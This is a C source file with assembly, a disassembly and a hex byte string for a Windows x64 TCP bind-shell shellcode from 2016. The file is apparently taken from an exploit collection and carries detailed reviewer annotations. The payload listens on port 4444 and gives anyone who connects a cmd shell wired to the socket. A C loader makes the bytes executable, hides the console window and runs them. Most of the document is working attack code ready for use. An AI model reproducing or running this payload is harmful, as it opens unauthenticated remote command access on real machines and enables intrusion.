/*
# Title : Windows x64 Bind Shell TCP Shellcode
# size : 508 bytes
# Date : 08-12-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 Professional x64
*/
/*
section .text
global _start
;-----------------------------------------------------------------------
; Windows x64 TCP bind-shell payload (NASM syntax, Microsoft x64 ABI).
;
; Sequence: locate kernel32 through the PEB loader list -> LoadLibraryA("ws2_32")
;   -> WSAStartup -> WSASocketA -> setsockopt -> bind(0.0.0.0:4444) -> listen
;   -> accept -> CreateProcessA("cmd") with the accepted socket as the child's
;   stdin/stdout/stderr -> one last kernel32 call with rcx = 1 (left unlabelled
;   by the author). Control never returns to the caller.
;
; ABI reminders used throughout: args in rcx, rdx, r8, r9, then [rsp+32],
;   [rsp+40], ...; the caller owes the callee a 32-byte shadow area at [rsp].
;
; Registers live across calls:
;   r14 = kernel32.dll base          rsi = kernel32 AddressOfFunctions table
;   r15 = ws2_32.dll base            rdi = ws2_32 AddressOfFunctions table
;   r12 = 128-byte scratch buffer    r13 = listening SOCKET
;   rbx = address of the API about to be called (every call is "call rbx")
;
; Reviewer notes:
;   - APIs are resolved by a fixed index into each DLL's AddressOfFunctions
;     array (no name lookup, no hashing). The ws2_32 indices match that DLL's
;     fixed export ordinals (accept=1, bind=2, listen=13, setsockopt=21,
;     WSASocketA=99, WSAStartup=115; index = ordinal-1), so they are stable;
;     the kernel32 indices 832 / 165 / 297 are positions in one particular
;     build's table, which is why the header pins "Windows 7".
;   - Immediates go through 8-/16-bit partial registers (mov dl / mov dx /
;     mov cx) after an xor, and small values are loaded with push/pop. This
;     appears to be done to keep the encoding free of 0x00 bytes; the C loader
;     below depends on that when it sizes the payload with strlen().
;   - The strings "ws2_32" and "cmd" are stored as plain immediates, so they
;     are visible in the raw bytes (see the disassembly below).
;   - rsp is lowered before most calls and never raised again until the final
;     add rsp,88; no 16-byte alignment is maintained. 88 bytes = 32-byte
;     shadow area + the six 8-byte stack arguments CreateProcessA needs
;     ([rsp+32] .. [rsp+72]).
;-----------------------------------------------------------------------
_start:
; --- kernel32.dll base: PEB -> Ldr -> InLoadOrderModuleList, third entry ---
xor rdx,rdx
mov rax,[gs:rdx+0x60]   ; rax = PEB (gs:[0x60] on 64-bit Windows)
mov rsi,[rax+0x18]      ; rsi = PEB->Ldr
mov rsi,[rsi+0x10]      ; rsi = Ldr->InLoadOrderModuleList.Flink = 1st entry (this .exe)
lodsq                   ; rax = [rsi] = 2nd entry (normally ntdll.dll)
mov rsi,[rax]           ; rsi = 3rd entry
mov r14,[rsi+0x30]      ; r14 = that entry's DllBase: kernel32.dll on the tested build
;----------------------
; --- kernel32 export directory: e_lfanew -> NT headers -> DataDirectory[0] ---
mov dl,0x88             ; 0x88 = offset of the export DataDirectory RVA inside IMAGE_NT_HEADERS64
mov ebx,[r14+0x3c]      ; IMAGE_DOS_HEADER.e_lfanew
add rbx,r14             ; rbx = IMAGE_NT_HEADERS64
mov ebx,[rbx+rdx]       ; export directory RVA
add rbx,r14             ; rbx = IMAGE_EXPORT_DIRECTORY
;--------------------------
mov esi,[rbx+0x1c]      ; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions (RVA)
add rsi,r14 ;rsi = kernel32 AddressOfFunctions table (array of DWORD RVAs); the base itself stays in r14
;-------------------------------
mov dx,832
mov ebx,[rsi+rdx*4]     ; table entry #832 (DWORD entries, hence the scale of 4; later lookups pre-multiply the index instead)
add rbx,r14 ;LoadLibraryA() on the tested kernel32 build (index is build-specific)
;-------------------------------
mov dl,128
sub rsp,rdx             ; 128-byte scratch buffer ...
lea r12,[rsp]           ; ... addressed through r12: "ws2_32", sockaddr_in, then STARTUPINFOA at +0 and PROCESS_INFORMATION at +104
;----------------------------------------------------
;loading ws2_32.dll
xor rdx,rdx
mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl     ; dl = 0: NUL terminator -> "ws2_32"
lea rcx,[r12]           ; rcx = lpLibFileName
sub rsp,88              ; shadow area for the call (not released afterwards)
call rbx
mov r15,rax ;ws2_32.dll base address
;--------------------------------------------------
; --- same export-directory walk for ws2_32; rdi = its AddressOfFunctions table ---
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]      ; e_lfanew
add rbx,r15             ; IMAGE_NT_HEADERS64
mov ebx,[rbx+rdx]       ; export directory RVA
add rbx,r15             ; IMAGE_EXPORT_DIRECTORY
mov edi,[rbx+0x1c]      ; AddressOfFunctions RVA
add rdi,r15             ; rdi = ws2_32 AddressOfFunctions table
;------------------------------
mov dx,114*4            ; byte offset of entry #114 (ordinal 115 = WSAStartup); pre-scaled, so indexed with [rdi+rdx]
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()
;-----------------------------------
;WSAStartup(514,&WSADATA)
xor rcx,rcx
mov cx,408
sub rsp,rcx             ; 408 bytes = sizeof(WSADATA) on x64, used as lpWSAData
lea rdx,[rsp]           ; rdx = lpWSAData
mov cx,514              ; rcx = wVersionRequested = 0x0202 (Winsock 2.2)
sub rsp,88              ; shadow area
call rbx
;-------------------------------------------
xor rdx,rdx
mov dx,98*4             ; entry #98 (ordinal 99 = WSASocketA)
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()
;WSASocket(2,1,6,0,0,0)
push 6                  ; push/pop pairs load small immediates with 2-byte encodings
push 1
push 2
pop rcx                 ; rcx = af = 2 (AF_INET)
pop rdx                 ; rdx = type = 1 (SOCK_STREAM)
pop r8                  ; r8 = protocol = 6 (IPPROTO_TCP)
xor r9,r9               ; r9 = lpProtocolInfo = NULL
mov [rsp+32],r9         ; 5th arg: g = 0
mov [rsp+40],r9         ; 6th arg: dwFlags = 0
call rbx                ; no new sub rsp: reuses the 88 bytes left over from the previous call
mov r13,rax ;SOCKET
;--------------------------------------------
mov ebx,[rdi+80]        ; entry #20 (80/4; ordinal 21 = setsockopt)
add rbx,r15 ;setsockopt()
;setsockopt(SOCKET,0xffff,4,&1,4)
xor rdx,rdx
mov rcx,r13             ; rcx = s
mov dx,0xffff           ; rdx = level = SOL_SOCKET
push 4
pop r8                  ; r8 = optname = 4 (SO_REUSEADDR)
mov [rsp],byte 1        ; optval: only the low byte is written; the other three bytes of the DWORD are whatever earlier callees left in this shadow area, so the value is merely "nonzero"
lea r9,[rsp]            ; r9 = optval
sub rsp,88              ; shadow area
mov [rsp+32],r8         ; 5th arg: optlen = 4
call rbx
;--------------------------------------------------
mov ebx,[rdi+4]         ; entry #1 (ordinal 2 = bind)
add rbx,r15 ;bind()
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
push 16
pop r8                  ; r8 = namelen = 16
xor rdx,rdx
mov [r12],rdx           ; zero the 16-byte sockaddr_in at r12 ...
mov [r12+8],rdx         ; ... so sin_addr stays 0.0.0.0 (INADDR_ANY)
mov [r12],byte 2        ; sin_family = AF_INET (high byte left 0 by the zeroing above)
mov [r12+2],word 0x5c11 ;sin_port: bytes 11 5c in memory = 0x115c in network byte order = 4444
lea rdx,[r12]           ; rdx = name
mov rcx,r13             ; rcx = s
call rbx                ; shadow area still present from the previous sub rsp,88
;----------------------------------------
mov ebx,[rdi+48]        ; entry #12 (ordinal 13 = listen)
add rbx,r15 ;listen()
;listen(SOCKET,1)
push 1
pop rdx                 ; rdx = backlog = 1
push r13
pop rcx                 ; rcx = s
call rbx
;-----------------------------------
mov ebx,[rdi]           ; entry #0 (ordinal 1 = accept)
add rbx,r15 ;accept()
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
xor rdx,rdx
mov [r12],rdx           ; clear the 16-byte addr buffer again
mov [r12+8],rdx
mov dl,16
push rdx                ; the addrlen variable (16) lives on the stack ...
lea r8,[rsp]            ; ... r8 = &addrlen
lea rdx,[r12]           ; rdx = addr
mov rcx,r13             ; rcx = s
sub rsp,88              ; shadow area
call rbx                ; rax = accepted SOCKET; rax is not written again until it is stored into STARTUPINFOA below
;-------------------------------------------
; --- STARTUPINFOA at r12 (104 bytes), PROCESS_INFORMATION at r12+104 (24 bytes) ---
xor rdx,rdx
mov [r12],rdx           ; zero bytes 0..15
mov [r12+8],rdx
mov dl,104
xor rcx,rcx             ; rcx = 0; used for zeroing here and left as CreateProcessA's lpApplicationName below
mov [r12],dword edx     ; cb = 104 = sizeof(STARTUPINFOA) on x64
mov [r12+4],rcx         ; zero bytes 4..31 (padding, lpReserved, lpDesktop, lpTitle)
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
mov dl,255
inc rdx                 ; rdx = 256 = STARTF_USESTDHANDLES, built as 255+1
mov [r12+0x3c],edx      ; dwFlags
mov [r12+0x50],rax      ; hStdInput  = accepted socket
mov [r12+0x58],rax      ; hStdOutput = accepted socket
mov [r12+0x60],rax      ; hStdError  = accepted socket
; NOTE(review): bytes 0x20..0x4f (dwX .. lpReserved2) are never written and keep whatever the buffer held before; presumably ignored with only STARTF_USESTDHANDLES set -- confirm
;--------------------------------------------------
mov [r12-4],dword 'cmdA' ; "cmdA" four bytes below the scratch buffer (inside the 88-byte region reserved at the first call) ...
mov [r12-1],byte cl     ; ... cl = 0 overwrites the 'A': "cmd\0"
;-----------------------------------------
sub rsp,88              ; shadow area + room for the six stack arguments
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
; rcx is still 0 from above = lpApplicationName
lea rdx,[r12-4] ;"cmd" = lpCommandLine
xor r8,r8 ;NULL = lpProcessAttributes
push r8
pop r9 ;NULL = lpThreadAttributes
mov [rsp+32],byte 1 ;TRUE = bInheritHandles (byte write: the rest of the 32-bit slot is stale, but any nonzero BOOL reads as TRUE)
mov [rsp+40],r8 ;0 = dwCreationFlags
mov [rsp+48],r8 ;NULL = lpEnvironment
mov [rsp+56],r8 ;NULL = lpCurrentDirectory
lea rax,[r12]
mov [rsp+64],rax        ; lpStartupInfo
lea rax,[r12+104]
mov [rsp+72],rax        ; lpProcessInformation
xor r10,r10
mov r10w,165*4          ; kernel32 table entry #165 (build-specific)
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()
call rbx
;-----------------------------------------------
mov r10w,297*4          ; kernel32 table entry #297 (build-specific); the author leaves it unlabelled
mov ebx,[rsi+r10]
add rbx,r14
push 1
pop rcx                 ; rcx = 1: first argument of that call
add rsp,88              ; the only stack release in the payload
call rbx                ; presumably a process-exit call, since nothing follows -- confirm against the build's export table
*/
/*
file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 4c 8b 76 30 mov 0x30(%rsi),%r14
19: b2 88 mov $0x88,%dl
1b: 41 8b 5e 3c mov 0x3c(%r14),%ebx
1f: 4c 01 f3 add %r14,%rbx
22: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
25: 4c 01 f3 add %r14,%rbx
28: 8b 73 1c mov 0x1c(%rbx),%esi
2b: 4c 01 f6 add %r14,%rsi
2e: 66 ba 40 03 mov $0x340,%dx
32: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
35: 4c 01 f3 add %r14,%rbx
38: b2 80 mov $0x80,%dl
3a: 48 29 d4 sub %rdx,%rsp
3d: 4c 8d 24 24 lea (%rsp),%r12
41: 48 31 d2 xor %rdx,%rdx
44: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
4b: 5f
4c: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
53: 32
54: 41 88 54 24 06 mov %dl,0x6(%r12)
59: 49 8d 0c 24 lea (%r12),%rcx
5d: 48 83 ec 58 sub $0x58,%rsp
61: ff d3 callq *%rbx
63: 49 89 c7 mov %rax,%r15
66: 48 31 d2 xor %rdx,%rdx
69: b2 88 mov $0x88,%dl
6b: 41 8b 5f 3c mov 0x3c(%r15),%ebx
6f: 4c 01 fb add %r15,%rbx
72: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
75: 4c 01 fb add %r15,%rbx
78: 8b 7b 1c mov 0x1c(%rbx),%edi
7b: 4c 01 ff add %r15,%rdi
7e: 66 ba c8 01 mov $0x1c8,%dx
82: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
85: 4c 01 fb add %r15,%rbx
88: 48 31 c9 xor %rcx,%rcx
8b: 66 b9 98 01 mov $0x198,%cx
8f: 48 29 cc sub %rcx,%rsp
92: 48 8d 14 24 lea (%rsp),%rdx
96: 66 b9 02 02 mov $0x202,%cx
9a: 48 83 ec 58 sub $0x58,%rsp
9e: ff d3 callq *%rbx
a0: 48 31 d2 xor %rdx,%rdx
a3: 66 ba 88 01 mov $0x188,%dx
a7: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
aa: 4c 01 fb add %r15,%rbx
ad: 6a 06 pushq $0x6
af: 6a 01 pushq $0x1
b1: 6a 02 pushq $0x2
b3: 59 pop %rcx
b4: 5a pop %rdx
b5: 41 58 pop %r8
b7: 4d 31 c9 xor %r9,%r9
ba: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
bf: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
c4: ff d3 callq *%rbx
c6: 49 89 c5 mov %rax,%r13
c9: 8b 5f 50 mov 0x50(%rdi),%ebx
cc: 4c 01 fb add %r15,%rbx
cf: 48 31 d2 xor %rdx,%rdx
d2: 4c 89 e9 mov %r13,%rcx
d5: 66 ba ff ff mov $0xffff,%dx
d9: 6a 04 pushq $0x4
db: 41 58 pop %r8
dd: c6 04 24 01 movb $0x1,(%rsp)
e1: 4c 8d 0c 24 lea (%rsp),%r9
e5: 48 83 ec 58 sub $0x58,%rsp
e9: 4c 89 44 24 20 mov %r8,0x20(%rsp)
ee: ff d3 callq *%rbx
f0: 8b 5f 04 mov 0x4(%rdi),%ebx
f3: 4c 01 fb add %r15,%rbx
f6: 6a 10 pushq $0x10
f8: 41 58 pop %r8
fa: 48 31 d2 xor %rdx,%rdx
fd: 49 89 14 24 mov %rdx,(%r12)
101: 49 89 54 24 08 mov %rdx,0x8(%r12)
106: 41 c6 04 24 02 movb $0x2,(%r12)
10b: 66 41 c7 44 24 02 11 movw $0x5c11,0x2(%r12)
112: 5c
113: 49 8d 14 24 lea (%r12),%rdx
117: 4c 89 e9 mov %r13,%rcx
11a: ff d3 callq *%rbx
11c: 8b 5f 30 mov 0x30(%rdi),%ebx
11f: 4c 01 fb add %r15,%rbx
122: 6a 01 pushq $0x1
124: 5a pop %rdx
125: 41 55 push %r13
127: 59 pop %rcx
128: ff d3 callq *%rbx
12a: 8b 1f mov (%rdi),%ebx
12c: 4c 01 fb add %r15,%rbx
12f: 48 31 d2 xor %rdx,%rdx
132: 49 89 14 24 mov %rdx,(%r12)
136: 49 89 54 24 08 mov %rdx,0x8(%r12)
13b: b2 10 mov $0x10,%dl
13d: 52 push %rdx
13e: 4c 8d 04 24 lea (%rsp),%r8
142: 49 8d 14 24 lea (%r12),%rdx
146: 4c 89 e9 mov %r13,%rcx
149: 48 83 ec 58 sub $0x58,%rsp
14d: ff d3 callq *%rbx
14f: 48 31 d2 xor %rdx,%rdx
152: 49 89 14 24 mov %rdx,(%r12)
156: 49 89 54 24 08 mov %rdx,0x8(%r12)
15b: b2 68 mov $0x68,%dl
15d: 48 31 c9 xor %rcx,%rcx
160: 41 89 14 24 mov %edx,(%r12)
164: 49 89 4c 24 04 mov %rcx,0x4(%r12)
169: 49 89 4c 24 0c mov %rcx,0xc(%r12)
16e: 49 89 4c 24 14 mov %rcx,0x14(%r12)
173: 49 89 4c 24 18 mov %rcx,0x18(%r12)
178: b2 ff mov $0xff,%dl
17a: 48 ff c2 inc %rdx
17d: 41 89 54 24 3c mov %edx,0x3c(%r12)
182: 49 89 44 24 50 mov %rax,0x50(%r12)
187: 49 89 44 24 58 mov %rax,0x58(%r12)
18c: 49 89 44 24 60 mov %rax,0x60(%r12)
191: 41 c7 44 24 fc 63 6d movl $0x41646d63,-0x4(%r12)
198: 64 41
19a: 41 88 4c 24 ff mov %cl,-0x1(%r12)
19f: 48 83 ec 58 sub $0x58,%rsp
1a3: 49 8d 54 24 fc lea -0x4(%r12),%rdx
1a8: 4d 31 c0 xor %r8,%r8
1ab: 41 50 push %r8
1ad: 41 59 pop %r9
1af: c6 44 24 20 01 movb $0x1,0x20(%rsp)
1b4: 4c 89 44 24 28 mov %r8,0x28(%rsp)
1b9: 4c 89 44 24 30 mov %r8,0x30(%rsp)
1be: 4c 89 44 24 38 mov %r8,0x38(%rsp)
1c3: 49 8d 04 24 lea (%r12),%rax
1c7: 48 89 44 24 40 mov %rax,0x40(%rsp)
1cc: 49 8d 44 24 68 lea 0x68(%r12),%rax
1d1: 48 89 44 24 48 mov %rax,0x48(%rsp)
1d6: 4d 31 d2 xor %r10,%r10
1d9: 66 41 ba 94 02 mov $0x294,%r10w
1de: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1e2: 4c 01 f3 add %r14,%rbx
1e5: ff d3 callq *%rbx
1e7: 66 41 ba a4 04 mov $0x4a4,%r10w
1ec: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1f0: 4c 01 f3 add %r14,%rbx
1f3: 6a 01 pushq $0x1
1f5: 59 pop %rcx
1f6: 48 83 c4 58 add $0x58,%rsp
1fa: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
/* The payload above, byte for byte, as a C string. main() measures it with
 * strlen(), so it must not contain a 0x00 byte; the listed encoding appears
 * to be NUL-free. */
char shellcode[]=\
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6
a\x01\x59\x48\x83\xc4\x58\xff\xd3";
int main()
{
/* Test harness only: makes the byte array executable, hides the console
 * window, then jumps into the payload. It is not expected to return. */
int len=strlen(shellcode);    /* only correct while the payload contains no 0x00 byte */
DWORD l=0;                    /* receives the previous protection from VirtualProtect */
printf("shellcode length : %d\n",len);
//making memory executable: a global initialized array normally lands in a non-executable data section
// NOTE(review): the return value is not checked; if the call fails, the indirect call below faults on a non-executable page
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
//hiding the console window (0 = SW_HIDE)
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
// transfer control to the payload; its final call is unlabelled in the listing above and is not expected to return here
(* (int(*)()) shellcode)();
return 0;
}